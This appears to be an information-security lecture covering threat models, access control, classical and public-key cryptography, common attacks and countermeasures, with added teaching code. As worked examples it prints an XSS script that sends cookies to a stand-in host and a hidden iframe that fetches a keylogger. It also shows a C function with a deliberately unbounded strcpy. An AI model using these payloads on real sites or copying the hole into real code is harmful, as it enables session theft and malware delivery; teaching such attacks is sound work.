
A brief introduction to information security, Part II

Tyler Moore

Computer Science & Engineering Department, SMU, Dallas, TX

Lecture 3

Engineered defenses to achieve protection goals

Security threats

Countering security threats

Let’s recap last time

Safety vs. security

Information security protection goals
1 Confidentiality: information is accessible only to authorized parties
2 Integrity: modification of information can be detected
3 Availability: authorized parties can access information (and use resources) when and where it is needed

Identification vs. authentication vs. authorization

Computer systems and networks

Information security overview

Protection goals: confidentiality, integrity, availability

1. Engineer defenses to satisfy goals
2. Security threats
3. Countering security threats

Engineered defenses to achieve protection goals

Protection goals: confidentiality, integrity, availability
1. Engineer defenses to satisfy goals

Subsections: threat models; access control for system security; cryptography for communication security

Threat models

All security is relative, but relative to what?

⇒ Threat models codify assumed adversary behavior

Threat models articulate assumed adversary behavior
1 Goal: disrupting defender’s protection goals, make money, wreak havoc
2 Knowledge: does the attacker know how the defense works?
3 Capabilities: computational power available, time available to target defenders, local vs. global eavesdropping, active vs. passive

Question: could a threat model be fully specified by assuming a certain level of financial resources available to the adversary?

Access control

Recall claim from last class: authorization decision is the fundamental challenge of security engineering

Access control is how computer systems enforce authorization decisions

⇒ definition: ensuring that an authorized user can access and modify only those resources to which he is entitled

The rise of the superuser

Operating systems (OSes) separate processes that run the OS from processes run by users

OS processes have many powers – reading all communications, installing software, etc.

These powers can readily be abused by a malicious software designer

Solution: create a superuser that can have OS-level capabilities, constrain what regular users can do

Operating System Security

[Figure: processes P1, P2, P3 and resources R1, R2, R3 sit above the KERNEL (Pi = process i, Rj = resource j). The kernel enforces authorization decisions for inter-process communication and resource access, and must prevent side channels and covert channels between processes (one process is labelled with a secret key, the kind of data a side channel would leak). Systems with direct access to hardware and no such kernel boundary: MS-DOS, Mac OS 9, Windows 3.11, 95, 98, ME, many embedded systems.]

Same principle on higher layers: virtualization, sandboxes, . . .

Principle of least privilege

Principle of least privilege: any file or process should be assigned the minimum level of permissions needed in order to complete the required task

+ Limits the damage a process can cause others

- Conflicts with desire to make systems easy-to-use and adaptable

Question: what incentive conflict does a programmer face when requesting privileges?

Cryptography

Protecting information on a computer system is necessary but not sufficient to meet protection goals

Must also protect communications between systems

Cryptography (crypto for short) can be used to ensure confidentiality and integrity of communications

Recall the broker example from last time

Broker → Exchange: 〈BUY, 200, GOOG, $600.25〉

Crypto traditionally refers to Alice and Bob

[Figure: Alice sends Bob the message “I love your music”. Eve eavesdrops on it; Mallory alters it in transit, turning “love” into “hate”.]

Crypto B.C.

Julius Caesar enciphered messages by shifting letters by three

Those receiving the message knew to shift back

Plaintext:  THISISIMPORTANT
Secret key: DDDDDDDDDDDDDDD
Ciphertext: WKLVLVLPSRUWDQW

Vigenère cipher

Shift each letter by a different amount, repeating after n letters

Plaintext:  THISISIMPORTANT
Secret key: DABDABDABDABDAB
Ciphertext: WHJVITLMQRRUDNU

One-time pad

Shift each letter by a different amount, never repeating

Plaintext:  THISISIMPORTANT
Secret key: DABHJIZXEBTULQP
Ciphertext: WHJZRAHJTPKNLDI

Question: what is the key length?
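The Caesar, Vigenère and one-time pad slides above are one operation, adding a key letter to each plaintext letter modulo 26, with keys of different length. The Python below is an added example, not code from the lecture slides: it implements that operation once, reproduces the three ciphertexts from the slides (plaintext and keys are the slides’ own), and refuses a one-time pad key shorter than the message, since a pad that repeats is no longer a one-time pad. Function names and the key-length check are this example’s assumptions.

```python
"""Shift-cipher family from the slides: Caesar, Vigenere and one-time pad.

All three add a key letter (A=0 ... Z=25) to each plaintext letter modulo 26.
They differ only in how long the key is and whether it repeats.
"""

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def keystream(key: str, length: int, repeat: bool) -> str:
    """Expand the key to cover `length` letters.

    Caesar and Vigenere repeat the key; a one-time pad must never repeat,
    so a pad shorter than the message is rejected.
    """
    key = key.upper()
    if repeat:
        return (key * (length // len(key) + 1))[:length]
    if len(key) < length:
        raise ValueError("one-time pad key must be at least as long as the message")
    return key[:length]


def shift_encrypt(plaintext: str, key: str, repeat: bool = True) -> str:
    """Encrypt letters only (A-Z); other characters are dropped, as on the slides."""
    letters = [c for c in plaintext.upper() if c in ALPHABET]
    stream = keystream(key, len(letters), repeat)
    return "".join(
        ALPHABET[(ALPHABET.index(p) + ALPHABET.index(k)) % 26]
        for p, k in zip(letters, stream)
    )


def shift_decrypt(ciphertext: str, key: str, repeat: bool = True) -> str:
    """Undo shift_encrypt: subtract the same keystream letter by letter."""
    stream = keystream(key, len(ciphertext), repeat)
    return "".join(
        ALPHABET[(ALPHABET.index(c) - ALPHABET.index(k)) % 26]
        for c, k in zip(ciphertext.upper(), stream)
    )


def caesar(plaintext: str, shift_letter: str = "D") -> str:
    """Caesar: a one-letter key repeated for the whole message (D = shift by 3)."""
    return shift_encrypt(plaintext, shift_letter)


def vigenere(plaintext: str, key: str) -> str:
    """Vigenere: an n-letter key repeated every n letters."""
    return shift_encrypt(plaintext, key)


def one_time_pad(plaintext: str, pad: str) -> str:
    """One-time pad: key as long as the message, used once, never repeated."""
    return shift_encrypt(plaintext, pad, repeat=False)


if __name__ == "__main__":
    msg = "THISISIMPORTANT"
    print(caesar(msg))                           # WKLVLVLPSRUWDQW
    print(vigenere(msg, "DAB"))                  # WHJVITLMQRRUDNU
    print(one_time_pad(msg, "DABHJIZXEBTULQP"))  # WHJZRAHJTPKNLDI
```

Only the key handling changes between the three calls; everything the later slides say about key length (short keys reused versus a key as long as the traffic) is visible in `keystream`.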

Symmetric cryptography

[Figure: a key distribution center hands the shared key k_AB to both Alice and Bob; Alice then sends Bob {I love your music}_k_AB, the message encrypted under k_AB.]

Symmetric cryptography

Instead of a word, secret keys in modern symmetric encryption systems (e.g., AES) are stored as random sequences of bits

Keys are short relative to the message (unless using a one-time pad)

Limiting factor: distributing a shared secret to both parties before communicating securely

Perils of long keys: Russian one-time pad

Source: Marcus Ranum/MI5

Asymmetric cryptography (aka public-key cryptography)

Huge breakthrough: communicating parties do not need to share a secret key in advance

Trick: use one-way functions that are easy to compute but difficult to reverse

Rather than a shared secret, generate a key pair
K_A^-1: public key to encrypt messages
K_A: private key to decrypt messages

Private keys kept secret, but public keys can be told to everyone

Keys are tied to individuals, not pairs of individuals

⇒ n key pairs for n people
Question: how many symmetric keys would be needed for n people to communicate?

Asymmetric cryptography: protecting confidentiality

Bob → everyone (broadcast): K_B^-1
Alice → Bob: {I love your music}_K_B^-1
Bob decrypts with his private key: {{I love your music}_K_B^-1}_K_B

Asymmetric cryptography: protecting integrity

Alice → everyone (broadcast): K_A^-1
Alice → Bob: {I love your music}_K_A
Bob decrypts with Alice’s public key: {{I love your music}_K_A}_K_A^-1

Using asymmetric crypto to distribute symmetric keys

Bob ↔ Amazon

0. Amazon publishes its public key K_A^-1 to a C.A.
1. Bob looks up Amazon’s public key K_A^-1
2. Bob chooses session key K_BA, encrypts and sends {K_BA}_K_A^-1
3. Amazon decrypts {{K_BA}_K_A^-1}_K_A using private key K_A
4. Amazon → Bob: {Request payment}_K_BA
5. Bob → Amazon: {Credit Card #}_K_BA
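The three asymmetric-crypto slides above (confidentiality, integrity, and distributing a symmetric session key) all rest on one trapdoor operation. The Python below is an added example, not code from the slides or from any real product: textbook RSA with two small constructed primes and no padding, which is enough to show the shape of the protocols but is not something to deploy (real systems use padded RSA or elliptic curves, and AES for the bulk traffic). It keeps the slides’ notation, K^-1 for the public key and K for the private key; the prime pair, the SHAKE-128 keystream standing in for a real symmetric cipher, and the message numbers used as nonces are this example’s assumptions.

```python
"""Toy public-key protocols for the Alice/Bob/Amazon slides (textbook RSA, no padding)."""
import hashlib
import secrets


def make_keypair(p: int, q: int, e: int = 65537):
    """Return (public K^-1, private K) as (exponent, modulus) pairs from two primes.

    Easy direction: n = p*q.  Hard direction: recovering p and q from n.
    The private exponent d is the inverse of e modulo (p-1)(q-1).
    """
    n = p * q
    d = pow(e, -1, (p - 1) * (q - 1))  # requires gcd(e, (p-1)(q-1)) == 1
    return (e, n), (d, n)


def apply_key(value: int, key) -> int:
    """RSA is a single operation, value**exp mod n; which key is used decides the effect."""
    exp, n = key
    if not 0 <= value < n:
        raise ValueError("value must be smaller than the modulus")
    return pow(value, exp, n)


def digest(message: bytes, n: int) -> int:
    """Hash the message to an integer below n; signatures cover the hash, not the text."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes, private_key) -> int:
    """Integrity slide: only the holder of the private key K_A can produce this."""
    return apply_key(digest(message, private_key[1]), private_key)


def verify(message: bytes, signature: int, public_key) -> bool:
    """Anyone holding the public key K_A^-1 can check the signature."""
    return apply_key(signature, public_key) == digest(message, public_key[1])


def stream_encrypt(session_key: int, nonce: int, data: bytes) -> bytes:
    """Illustrative symmetric cipher (assumption: stands in for AES).

    XORs data with a SHAKE-128 keystream derived from the key and a per-message
    nonce, so two messages under one session key never share a keystream.
    Symmetric: the same call decrypts.
    """
    key_bytes = session_key.to_bytes((session_key.bit_length() + 7) // 8 or 1, "big")
    keystream = hashlib.shake_128(key_bytes + nonce.to_bytes(4, "big")).digest(len(data))
    return bytes(a ^ b for a, b in zip(data, keystream))


def hybrid_exchange(amazon_public, amazon_private, request: bytes, card: bytes):
    """Session-key slide: Bob wraps a fresh K_BA under Amazon's public key, then
    both sides use K_BA for the bulk traffic.  Returns what each side recovers."""
    _, n = amazon_public
    k_ba = secrets.randbelow(n - 1) + 1                # 2. Bob picks K_BA ...
    wrapped = apply_key(k_ba, amazon_public)            #    ... and sends {K_BA}K_A^-1
    k_ba_at_amazon = apply_key(wrapped, amazon_private) # 3. Amazon unwraps with K_A
    ct_request = stream_encrypt(k_ba_at_amazon, 4, request)  # 4. {Request payment}K_BA
    ct_card = stream_encrypt(k_ba, 5, card)                  # 5. {Credit Card #}K_BA
    return {
        "session_key_agreed": k_ba_at_amazon == k_ba,
        "request_seen_by_bob": stream_encrypt(k_ba, 4, ct_request),
        "card_seen_by_amazon": stream_encrypt(k_ba_at_amazon, 5, ct_card),
    }


if __name__ == "__main__":
    # Constructed small primes (the 10,000th and 100,000th primes); far too small for real use.
    public, private = make_keypair(104729, 1299709)
    sig = sign(b"I love your music", private)
    print(verify(b"I love your music", sig, public), verify(b"I hate your music", sig, public))
    print(hybrid_exchange(public, private, b"Request payment", b"4111 1111 1111 1111"))
```

Note what the slides’ later “why crypto is still hard” point looks like here: nothing in `hybrid_exchange` checks that the public key Bob looked up really belongs to Amazon. Step 0, the certificate authority, is the part this toy leaves out, and it is where key management goes wrong in practice.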

Why crypto is still hard in practice

Key management is hard to get right
⇒ Establishing public-key infrastructure tying identifiers to keys has proved elusive

Configuring systems can be difficult
⇒ Coordinating the distribution of information such as public keys before communication is inconvenient

Cryptosystems are often brittle and do not fail gracefully

Security threats

Protection goals: confidentiality, integrity, availability
1. Engineer defenses to satisfy goals
2. Security threats

Subsections: system vulnerabilities (violating engineering assumptions); cryptanalysis (violating physical or mathematical assumptions); violating assumptions about attacker behavior; violating assumptions about defender behavior

Security threats: assumptions gone awry

System vulnerabilities: violate engineering assumptions

Cryptanalysis: violate physical or mathematical assumptions

People just don’t behave as designers expect
Violate assumptions about attacker behavior
Violate assumptions about defender behavior

Privilege-escalation attacks

Recall that operating systems separate privileged data and programs from normal files and processes

Only superusers are allowed to execute sensitive and potentially harmful operations

Privilege-escalation attack: take on the role of superuser to carry out unauthorized actions (e.g., installing malicious software or reading sensitive files)

Adversaries exploit “bugs” to carry out attacks

Buffer Overflow

Example function in C (the slide’s vulnerable code, with the include it needs to compile; the unchecked strcpy is the point of the example):

    #include <string.h>

    int parse(char *msg)
    {
        char tmp[1000];

        strcpy(tmp, msg);   /* copies until the NUL in msg: no bound on tmp */
        /* ... do more ... */
        return 0;
    }

Strings are zero-delimited arrays: "test" → 0x74 65 73 74 00

Function strcpy cannot know the size of the destination buffer tmp; it copies msg up to its terminating zero, however long that is.

[Figure: stack of the x86 architecture. Local variables, including tmp, sit below the saved return address; addresses run from &tmp[0] up to &tmp[1000] and on into the return address. In the slide’s simplified frame, the 1001st to 1004th characters of msg overwrite the return address, and the bytes after them hold the malicious code the function then “returns” to. On a real frame a saved frame pointer and alignment padding usually sit between tmp and the return address, so the exact offset is larger.]

User-provided code is executed with the privileges of the host program.

Cross Site Scripting

[Figure: message sequence among client A, the web server and client B, the attacker.]
1. Client A initiates a session with the web server, receives a session ID and stores it as a cookie
2. B posts a malformed user comment containing script
3. Client A later accesses the user-generated content and retrieves B’s posting
4. A’s browser executes B’s code, which steals A’s session ID
5. B impersonates A

B’s posted comment:

    <script>
    document.write("<img src=\"http://www.mal.ru/"+encodeURI(document.cookie)+"\">");
    </script>

Code-injection attacks on xkcd

Drive-by-download attacks

Work in a similar manner to cross-site scripting, but the attacker actually gains write access to the web server

Inserts embedded links to malicious websites that download malware automatically, e.g. an invisible 1×1 frame:

    <iframe height="1" width="1" src="http://evil.ru/keylogger.exe"></iframe>

Question: how would encryption help prevent drive-by-download attacks or code-injection attacks?

Where attacks take place

[Figure: an end-user PC connects through a switch to ISP 1, whose router links to ISP 2’s router and on to a web server. Four attack positions are marked: (1) the attacker directly targets the end user, e.g. with spam; (2) the attacker eavesdrops on traffic between the ISPs; (3) the attacker hosts malware on a malicious server; (4) the attacker inserts malware into the web server.]

Cryptanalysis

Goal of cryptanalysis: descramble ciphertext without knowing the decryption key

Simplest approach: brute force
Key of length ℓ bits ⇒ 2^ℓ possible keys, so on average 2^(ℓ−1) guesses
For AES-128, ℓ = 128, so brute force requires about 2^127 attempts (100 times a trillion times a trillion times a trillion)

Cryptanalysts look for shortcuts (so that 2^k guesses are required, where k < ℓ)

What do the shortcuts look like?
Mathematical assumptions can fail
Look for patterns in ciphertext (i.e., loss of randomness)

Distribution of letters in English
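The letter-frequency chart above is the “pattern in ciphertext” shortcut from the previous slide applied to the shift ciphers from earlier in the lecture. The Python below is an added example, not code from the slides: it states the brute-force counts from the cryptanalysis slide as functions, then breaks a shift cipher under Kerckhoffs’ assumption (the algorithm is known, only the key is not) by trying all 26 keys and keeping the candidate whose letter counts are closest to English by a chi-squared distance. The frequency table is the commonly published English letter distribution; the sample plaintext is constructed here and encrypted with Caesar’s shift of 3.

```python
"""Brute force and frequency analysis against a shift cipher, Kerckhoffs-style:
the algorithm is public, only the key (the shift) is unknown."""

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Relative frequency (%) of each letter in typical English text, A..Z.
ENGLISH_FREQ = [
    8.17, 1.49, 2.78, 4.25, 12.70, 2.23, 2.02, 6.09, 6.97, 0.15, 0.77, 4.03, 2.41,
    6.75, 7.51, 1.93, 0.10, 5.99, 6.33, 9.06, 2.76, 0.98, 2.36, 0.15, 1.97, 0.07,
]


def keyspace(bits: int) -> int:
    """Number of keys for an l-bit key: 2**l."""
    return 2 ** bits


def expected_brute_force_guesses(bits: int) -> int:
    """A brute-force search tries half the keyspace on average: 2**(l-1)."""
    return 2 ** (bits - 1)


def shift(text: str, by: int) -> str:
    """Shift every letter of an A-Z string by `by` positions (mod 26)."""
    return "".join(ALPHABET[(ALPHABET.index(c) + by) % 26] for c in text)


def chi_squared(text: str) -> float:
    """Distance between the letter counts of `text` and English; lower is closer."""
    total = len(text)
    return sum(
        (text.count(letter) - expected) ** 2 / expected
        for letter, expected in zip(ALPHABET, (f * total / 100 for f in ENGLISH_FREQ))
    )


def break_shift_cipher(ciphertext: str):
    """Try all 26 keys and return (key, plaintext) for the most English-looking candidate.

    This is the slide's shortcut: the ciphertext is not random, so the key
    falls out of the letter statistics without any secret knowledge.
    """
    best_key = min(range(26), key=lambda k: chi_squared(shift(ciphertext, -k)))
    return best_key, shift(ciphertext, -best_key)


# Constructed sample: ordinary English, encrypted with Caesar's shift of 3.
SAMPLE_PLAINTEXT = (
    "CRYPTOGRAPHYISUSUALLYBYPASSEDRATHERTHANBROKENBECAUSEATTACKERS"
    "LOOKFORTHEWEAKESTLINKINTHESYSTEMANDTHATISRARELYTHECIPHERITSELF"
)
SAMPLE_CIPHERTEXT = shift(SAMPLE_PLAINTEXT, 3)

if __name__ == "__main__":
    print(break_shift_cipher(SAMPLE_CIPHERTEXT))
    print(keyspace(128), expected_brute_force_guesses(128))
```

The attack needs a few dozen letters of ciphertext to be reliable; on the fifteen-letter example from the slides two shifts score almost equally, which is why short messages were historically harder to break than long ones. A Vigenère key is broken the same way once its length is known, one column of the ciphertext at a time, and a true one-time pad defeats the method entirely because every shift is equally likely.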

Kerckhoffs’ Principle

Cryptographic algorithms must be public. Security depends only on the secrecy of the keys.

Rationales:
– avoid blind trust
– more eyes find more flaws
– err on the side of caution
– changing keys is easier than changing the system
– the only reasonable assumption to protect a public infrastructure

→ No security by obscurity

What can happen if you ignore Kerckhoffs

Source: http://www.schneier.com/blog/archives/2008/08/hacking_mifare.html

Do cryptanalysts have the right threat model?

Adi Shamir

Cryptography is usually bypassed. I am not aware of any major world-class security system employing cryptography in which the hackers penetrated the system by actually going through the cryptanalysis. [. . . ] Usually there are much simpler ways of penetrating the security system.

Most attackers bypass the threat model

This shouldn’t be surprising: a well-engineered system will be designed so that the attacks its designers planned for are hard to carry out

Threat models can go wrong in two ways
1 Ascribe too much power to an attacker or focus too much on a particular mode of attack
⇒ Leads to “over-engineering” and over-investment in defenses against certain threats
2 Miss attacks by not accounting for the behaviors and capabilities attackers actually have

The threat model adopted by cryptanalysts fails on both counts

Often overestimates attacker capability (focus on nation-state as adversary)

Singular focus on decrypting ciphertext without access to the encryption key ignores how most attacks take place

Much cheaper for an attacker to find a way to recover the key

Cold-boot attacks recover keys stored in volatile memory

Source: https://citp.princeton.edu/research/memory/

Users don’t always behave as system designers envision

Many successful attacks trick users into sharing keys and passwords

Systems security is predicated on users only taking actions that are in their own interest
⇒ Makes the designers’ job tractable
⇒ Offloads the hard decision of whether to allow untrusted software to execute onto the end user

Prompts condition users to ignore security warnings

Countering security threats

Protection goals: confidentiality, integrity, availability
1. Engineer defenses to satisfy goals
2. Security threats
3. Countering security threats

Subsections: ex post countermeasures; ex ante countermeasures

Countering security threats

When weaknesses are discovered in security defenses, defenders have two choices
1 Make fundamental changes to defenses
2 Counter the attacks directly

First approach could lead to improved security in the long run, but it is slow

Second approach is reactive, but more responsive
1 Ex post countermeasures: counter attacks and flaws after they are encountered
2 Ex ante countermeasures: counter flaws before an attack is realized

Ex post countermeasure: antivirus software

Most common ex post countermeasure

Checks for “signatures” of malicious executables running on a system

Database constantly growing to check for newly discovered malware

Cohen showed that deciding whether an arbitrary program is a virus is undecidable in general (it reduces to the halting problem)

⇒ AV software likely to remain a step behind virus writers

Ex post countermeasure: intrusion detection systems

IDSes look for attacks taking place on the network
Rule-based systems check for known attack patterns
Anomaly-based systems check for deviations from “good” traffic patterns

Challenges for IDSes
Internet is noisy – distinguishing malice from incompetence is non-trivial
False positives can undermine the system when true attacks are rare

Ex post countermeasure: intrusion detection systems

Suppose there are 10 true attacks for every one million network sessions

1% false positive rate ⇒ 10,000 false positives per one million sessions

1000:1 ratio of false positives to true positives
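The arithmetic above is the base-rate problem every alert queue lives with. The Python below is an added example, not from the slides: it carries the slide’s numbers through to the quantity an analyst actually experiences, the chance that a given alert is a real attack, and inverts the formula to show how low the false-positive rate would have to go for half the alerts to be real. The perfect detection rate is the slide’s implicit assumption and is exposed as a parameter.

```python
"""Base-rate arithmetic behind the IDS slide: with rare attacks, even a small
false-positive rate buries the true alerts."""


def alert_counts(sessions: int, attacks: int, false_positive_rate: float,
                 detection_rate: float = 1.0):
    """Return (true_positives, false_positives, precision) for one batch of sessions.

    precision = P(alert is a real attack), i.e. what the analyst reading the
    queue sees.  detection_rate defaults to 1.0, as the slide assumes.
    """
    benign = sessions - attacks
    true_positives = attacks * detection_rate
    false_positives = benign * false_positive_rate
    precision = true_positives / (true_positives + false_positives)
    return true_positives, false_positives, precision


def false_positive_rate_for_precision(sessions: int, attacks: int, target_precision: float,
                                      detection_rate: float = 1.0) -> float:
    """Largest false-positive rate that still achieves `target_precision`.

    Solves tp / (tp + benign * fpr) = target for fpr.
    """
    benign = sessions - attacks
    true_positives = attacks * detection_rate
    return true_positives * (1 - target_precision) / (target_precision * benign)


if __name__ == "__main__":
    tp, fp, precision = alert_counts(1_000_000, 10, 0.01)
    print(f"{fp:.0f} false positives for {tp:.0f} true ones; precision {precision:.2%}")
    print(f"FPR needed for 50% precision: {false_positive_rate_for_precision(1_000_000, 10, 0.5):.1e}")
```

With the slide’s numbers roughly one alert in a thousand is real, and reaching even 50% precision needs a false-positive rate around one in a hundred thousand sessions, which is why anomaly-based detection on raw traffic is hard to operate without further filtering.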

Ex post countermeasure: filters

Filters are a popular tool to block unwanted traffic

Usually operate at either network or application layer
Network layer is more efficient, but less granular (e.g., block outgoing port 25 traffic, allow incoming port 80)
Application layer is more granular (e.g., block unwanted URLs), but easier to circumvent and raises privacy concerns

Ingress vs. egress filtering
Ingress filtering can give a false sense of security – many harms emanate from within a network
Egress filtering protects against outgoing harm – when might you want that?

Where defenses are placed

[Figure: the same network path as in “Where attacks take place” (end-user PC, switch, ISP 1 and ISP 2 routers, web server, and the attacker’s four positions: direct spam at the end user, eavesdropping between the ISPs, hosting malware on a malicious server, inserting malware into the web server). Defenses are placed along the path in three groups: antivirus, firewall and blacklist; IDS, firewall and application relay; IDS, firewall and input validation.]

Considerations for where to defend

Technical considerations
Hard (and sometimes illegal!) to do application-level filtering at ISPs
Web servers should do input validation for maximum coverage

Economic considerations
Consider these attack scenarios: discuss which stakeholders have an incentive to defend
1 Spam coming from an infected computer
2 Website hacked to distribute drive-by-download
3 Website vulnerable to input-validation attack that steals server data

Ex ante countermeasures

Can be more proactive in defense, taking action before an incident happens

Compliance mechanisms (e.g., audit, penetration testing) look for configuration flaws before attackers do

Fundamental changes to the security infrastructure (e.g., Microsoft’s effort to improve security during software development)

Key issue: do you incur a small certain cost now or a larger but more uncertain cost later?
